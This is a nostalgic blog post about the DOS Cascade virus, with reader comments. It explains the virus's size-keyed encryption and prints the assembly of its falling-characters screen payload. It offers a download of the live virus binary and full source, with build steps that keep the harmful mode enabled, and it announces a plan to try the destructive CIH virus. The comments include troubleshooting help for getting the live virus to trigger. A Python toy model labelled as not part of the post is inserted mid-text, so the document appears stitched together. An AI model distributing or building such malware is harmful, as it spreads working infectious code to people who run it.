Kannan's Jumbled Thoughts

Cascade Virus: Down the memory lane.

I have always been fascinated with computer virii. My first exposure to computer virii was back in 1994, when my 360KB floppy disk got infected by STONED. There was so much hype around virii, and I was so misinformed, that I kept that infected disk in its jacket, away from all the other diskettes I owned, for 2 weeks!! No, I am not kidding.

Gokul (owner of Port Bit Systems, Trichy, who was my first computer teacher) looked like a hero to me when he could magically clean the infection by running a command-line DOS McAfee. Man, those days were cool! Later, when I started learning x86 assembly and DOS internals, I got fully absorbed into the wonder world of DOS virii. (I still have the first DOS anti-virus program I wrote – a “(C) Brain” remover – somewhere on my old HDD.) “Computer Viruses: Prevention, detection and cure” by Rajneesh Kapur was my first book on viruses; an excellent one! It is out of print now; I can’t even find it on the original publisher’s site.

One virus I fondly remember to this day is the famous (!?) CASCADE virus (a.k.a. Raindrop/17xx). This virus was a non-overwriting, resident COM infector. When triggered, it made the characters on the screen fall into a nice heap at the bottom. (Remember, we were in command-line mode then!) It was kind of cool to see this cascading action.

Cascade was the first virus to use encryption. The virus consisted of two parts – the virus body and an encryption routine. The latter encrypted the body of the virus so that it appeared different in every infected file. After the file was loaded, control was transferred to the decryption routine, which decoded the virus body and then transferred control to it. Unlike later polymorphic viruses, Cascade encoded only the body of the virus; the size of the infected file was used as the decryption key. Since the decryption routine itself remained unchanged from file to file, antivirus programs detected the virus with ease.
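To make the detection point concrete, here is a small toy model of that scheme (an added example, not code from the post or from the virus): the body is masked with a key derived from the host's final file size, so the stored body differs per host, but the decryptor stub in front of it is byte-for-byte identical everywhere, which is exactly what a signature scanner keys on. The stub bytes, the body string and the masking function are all constructed stand-ins, not the real Cascade code.

```python
# Toy model of Cascade's "constant decryptor + size-keyed body" layout.
# Constructed stand-ins only: neither value is real Cascade code.
DECRYPTOR_STUB = b"\xDE\xC0\xDE\x5B\xA5"        # same bytes in every "infected" file
BODY = b"pretend-virus-body:drop-characters"    # what the stub would recover at run time


def key_from_size(file_size: int) -> int:
    """Derive a 16-bit key from the infected file's size (the page's description)."""
    return file_size & 0xFFFF


def mask_body(body: bytes, key: int) -> bytes:
    """Symmetric XOR with a running counter seeded by the key.

    Applying it twice with the same key restores the original bytes, so the
    same routine serves as the 'encryptor' at infection time and the
    'decryptor' at load time (a constructed scheme, not Cascade's real loop).
    """
    out = bytearray()
    k = key
    for b in body:
        out.append(b ^ (k & 0xFF))
        k = (k + 1) & 0xFFFF
    return bytes(out)


def infect(host: bytes) -> bytes:
    """Append stub + masked body; the key comes from the size of the result."""
    final_size = len(host) + len(DECRYPTOR_STUB) + len(BODY)
    return host + DECRYPTOR_STUB + mask_body(BODY, key_from_size(final_size))


def decrypt_appended(infected: bytes) -> bytes:
    """What the stub would do at run time: unmask the body using the file size."""
    masked = infected[-len(BODY):]
    return mask_body(masked, key_from_size(len(infected)))


def stub_signature_hits(sample: bytes) -> bool:
    """Scanner view: the unchanging decryptor is a reliable byte-pattern signature."""
    return DECRYPTOR_STUB in sample


def body_signature_hits(sample: bytes) -> bool:
    """A signature on the plaintext body misses, since the stored body varies per host."""
    return BODY in sample
```

Infecting two hosts of different sizes yields two different stored bodies that both unmask to the same BODY, and only the stub signature matches both files.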

If you have never seen the virus in action, look at the screen shots below:

Cascade Virus: DOS command line


Cascade Virus: Edit.com DOS window

I took the above screenshots from an infected machine I set up. Last week, because of some re-orgs in my group (more about this in a later post!), I had enough time to install DOS in a VM and infect it with CASCADE. It actually felt good to use MASM after a long time to produce the live virus. Triggering the virus (setting the date to 11-30-1988) was a simple thing. If you think all of this is too much work, download the virtual HD from here. (TODO [Mar24,2008]: Link is not up yet. I will upload the VDI somewhere online and update this post. Please do let me know if you know of any reliable online file storing sites. TIA.) BTW, I used the open source VirtualBox for creating the testbed.

Alternatively, download the floppy disk image from here:

Download FDD image with Cascade Virus (1.44MB) Version 1.0

It has the floppy image with the live virus and source. After unzipping, you can write it to a 1.44MB floppy disk (or open it with an IMG-aware program).

What is in the disk?

I have included the following:

  • cascade.asm
    • The source code of the actual virus. This is the cleaned up version that I used for building the virus.
  • cascade.com
    • Live virus. Do not execute this on an unprotected system if you don’t know what you are doing. Be careful.
  • makehlv.bat
    • Cleaned up (for masm/x2b) make BAT file. Execute this from the prompt to build the virus.
  • readme.txt
    • Contains a description of file and SW requirements.

How to build the virus?

I used MASM 6.11d (16bit assembler) along with X2B (EXE -> COM Converter) for building the virus. You also need DOS debug executable for patching up the initial jump (automatically done by makehlv.bat). If you are using exe2bin, you have to modify makehlv.bat accordingly.

Once you have the environment setup, follow these steps:

  1. Open cascade.asm. Find “DEMO EQU FALSE” (it should be near line number 13). If you change this to “DEMO EQU TRUE”, the virus will not exhibit any harmful behaviour. For our purpose, leave it at “DEMO EQU FALSE”.
  2. Add “_DANGER EQU TRUE” after this line.
  3. Now, execute the following command from the command line to build the virus: makehlv cascade

Virus in action:

Video is always better than a static picture. Don’t you agree? Look at the following video I captured:

I also found another excellent video:

Virus Code:

The actual cascading is implemented in the following INT 1C handler. The function Random is called to obtain a random screen row and column. If the character there is not SPACE, it is moved downwards accordingly. The speaker is also toggled, which you won’t get to hear if you run this in a VM. The code is pretty self-explanatory.

You can get the complete source code here:

Download x86 ASM source code for Cascade virus Version 1.0

; INT 1Ch (timer tick) handler: the cascade payload. Numeric literals are
; hexadecimal (assumed: the full source sets the assembler radix accordingly).
; SAVE/REST/MOV_S are push/pop/segment-move macros defined elsewhere in cascade.asm.
XI_048      LABEL   NEAR
XR_009      EQU     XI_048 + PSPsize
        TEST    CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom  ; already inside, or external command active?
        JZ      XI_049
        JMP     XI_067                          ; yes: just chain to the original INT 1Ch
XI_049: OR      CS:[ISR_Flags],MASK R_in_1c     ; re-entrancy guard
        DEC     CS:[XR_002]                     ; tick countdown until the next cascade round
        JZ      XI_050
        JMP     XI_066                          ; not yet due
XI_050: SAVE    DS,ES
        MOV_S   DS,CS
        MOV_S   ES,CS
        SAVE    AX,BX,CX,DX,SI,DI,BP
        MOV     AL,EOI_8259A                    ; acknowledge the timer interrupt at the PIC
        OUT     PORT_B_8259A,AL
        MOV     AX,[XR_003]                     ; AX = max(XR_003, 0438) bounds the next random delay
        CMP     AX,0438
        JNB     XI_051
        MOV     AX,0438
XI_051: CALL    Random
        INC     AX
        MOV     [XR_002],AX                     ; reload the tick countdown
        MOV     [XR_003],AX
        PUSH    DS
        MOV     AX,BIOSDATASEG
        MOV     DS,AX
        MOV     AX,[B_VidPage]                  ; offset of the active video page (BIOS data area)
        POP     DS
        MOV     [Page_offset],AX
        MOV     [Last_Line],18                  ; default: 25 rows (0..18h)
        MOV     DL,-1
        MOV     AX,1130                         ; INT 10h/1130h: font info; DL returns rows-1 on EGA/VGA
        MOV     BH,0
        SAVE    ES,BP
        INT     10
        REST    BP,ES
        CMP     DL,-1
        JZ      XI_052
        MOV     [Last_Line],DL                  ; use the real last text row when reported
XI_052: CALL    GetSysSpeed
        MOV     AH,0F                           ; INT 10h/0Fh: AL = video mode, AH = columns
        INT     10
        MOV     [Num_of_Col],AH
        MOV     [Prevent_Snow?],0
        MOV     [Seg_of_VRAM],MonoBase
        CMP     AL,07                           ; mode 7: monochrome text
        JZ      XI_054
        JB      XI_053                          ; modes 0..6: colour adapter
        JMP     XI_064                          ; graphics mode: nothing to cascade
XI_053: MOV     [Seg_of_VRAM],ColorBase
        CMP     AL,03
        JA      XI_054
        CMP     AL,02
        JB      XI_054
        MOV     [Prevent_Snow?],01              ; modes 2/3 (CGA 80-column text) need snow avoidance
        MOV     AL,[Last_Line]
        INC     AL
        MUL     [Num_of_Col]                    ; rows * columns = number of character cells
        MOV     [Num_of_char],AX
        MOV     AX,[XR_004]
        CMP     AX,[Num_of_char]
        JBE     XI_054
        MOV     AX,[Num_of_char]
XI_054: CALL    Random
        INC     AX
        MOV     SI,AX                           ; SI = number of characters to drop this round
XI_055: XOR     DI,DI                           ; DI = attempts at finding a movable character
XI_056: INC     DI
        MOV     AX,[Num_of_char]
        SHL     AX,1
        CMP     DI,AX
        JBE     XI_057
        JMP     XI_064                          ; give up after 2 * cells failed picks
XI_057: OR      [ISR_Flags],MASK Recf_1
        MOV     AL,[Num_of_Col]
        MOV     AH,0
        CALL    Random
        MOV     DL,AL                           ; DL = random column
        MOV     AL,[Last_Line]
        MOV     AH,0
        CALL    Random
        MOV     DH,AL                           ; DH = random row
        CALL    Load_from_VRAM                  ; AL = char, AH = attribute at (DH,DL)
        CALL    Is_it_blank_?                   ; CF set if blank: pick again
        JB      XI_056
        CALL    Spec_Graphik?                   ; CF set for special graphics chars: leave them alone
        JB      XI_056
        MOV     [Last_Pair],AX
        MOV     CL,[Last_Line]                  ; CX = number of delayed single-row steps
        MOV     CH,0
XI_058: INC     DH                              ; look at the cell one row down
        CMP     DH,[Last_Line]
        JA      XI_062                          ; reached the bottom
        CALL    Load_from_VRAM
        CMP     AH,[Last_Attr]
        JNZ     XI_062                          ; different attribute: stop here
        CALL    Is_it_blank_?
        JB      XI_060                          ; blank below: move the character down one row
XI_059: CALL    Spec_Graphik?
        JB      XI_062
        INC     DH                              ; scan down over same-attribute non-blank cells
        CMP     DH,[Last_Line]
        JA      XI_062
        CALL    Load_from_VRAM
        CMP     AH,[Last_Attr]
        JNZ     XI_062
        CALL    Is_it_blank_?
        JNB     XI_059
        CALL    Toggle_Speaker
        DEC     DH
        CALL    Load_from_VRAM                  ; the char just above the blank is the one that falls
        MOV     [Last_Char],AL
        INC     DH
XI_060: AND     [ISR_Flags],NOT MASK Recf_1
        DEC     DH
        MOV     AL,' '
        CALL    Write_to_VRAM                   ; erase the source cell
        INC     DH
        MOV     AL,[Last_Char]
        CALL    Write_to_VRAM                   ; write the character one row lower
        JCXZ    XI_061
        CALL    Delay
        DEC     CX
XI_061: JMP     XI_058
XI_062: TEST    [ISR_Flags],MASK Recf_1
        JZ      XI_063
        JMP     XI_056                          ; nothing moved: pick another cell
XI_063: CALL    Toggle_Speaker
        DEC     SI
        JZ      XI_064
        JMP     XI_055                          ; next character of this round
XI_064: IN      AL,PORT_B_8255                  ; speaker off
        AND     AL,0FC
        OUT     PORT_B_8255,AL
        MOV     AX,3
        CALL    Random
        INC     AX
        MUL     [XR_004]                        ; grow XR_004 by a random factor, saturating on overflow
        JNB     XI_065
        MOV     AX,-1
XI_065: MOV     [XR_004],AX
        REST    BP,DI,SI,DX,CX,BX,AX,ES,DS
XI_066: AND     CS:[ISR_Flags],NOT MASK R_in_1c
XI_067: JMP     DWORD PTR CS:[Org_Int_1C]       ; chain to the original INT 1Ch handler

My next target is to try a destructive virus like CIH. I will let you know what happens. Till then enjoy the mesmerizing cascade effect :)

[Updated: May 16, 2010 - Fixed the download link]


11 Comments

  1. sudha says:

    yu sure have a way with words, dont yu? :) Some are born great, some achieve greatness and some have greatness thrust upon them . you definitely belong to the third category kannan,and yu know it too..:-)

  2. [...] I was uploading my Cascade virus video to in Google, I found the following videos. I am listing the videos I enjoyed here. Hope you [...]

  3. Juan says:

    hey there mister
    i just found your blog and i like they way u “express yourself”
    :)
    keep the good work

    P.D: I read your post on database light, i just downloaded it too, i didnt know these kind of programs even existed! U should have a little article explaining the cool features it has, and also put some of your games ;) . And talk more about chess!!

  4. kannanmr says:

    Thanks Juan for the suggestions. I will try to write more on using CB and Chess (anyway, its been ages since I updated my other blog on Chess!)

  5. [...] Cascade Virus: Down the memory lane. | Jumbled Thoughts Cascade is often not detected, because it produces no obvious effects. In the original version, the [...]

  6. Jan Den Haerynck says:

    This blog is the greatest continent I have visited in the www
    since a long, long time.
    The virii fascination is in me too!

  7. nEINEI says:

    ha thanks
    keep the good work.

  8. Daniel says:

    I know I’m probably doing something wrong, but I can’t get this virus to do its stuff. I’m attempting to run the executable .com file you provided on a standalone PC running DOS 6.22, but nothing happens after it’s executed. I’ve tried running com files for it to infect and changing the date to 11-30-88, nothing works. Any ideas?

  9. Daniel, usually it takes some time for the virus to trigger its payload. Try doing a couple of “dir /w” or “date”. Leave it for some time. It will trigger eventually.

  10. kenton says:

    I just learn about the virus recently, and the first virus I want to study is Cascade virus. When I google to your website, I found it’s really good, but why I can’t download the virus source code, the link is correct or just I don’t know how to use? Thanks for your reply

  11. kannanmr says:

    Kenton, download link fixed. thanks for bringing to my notice.
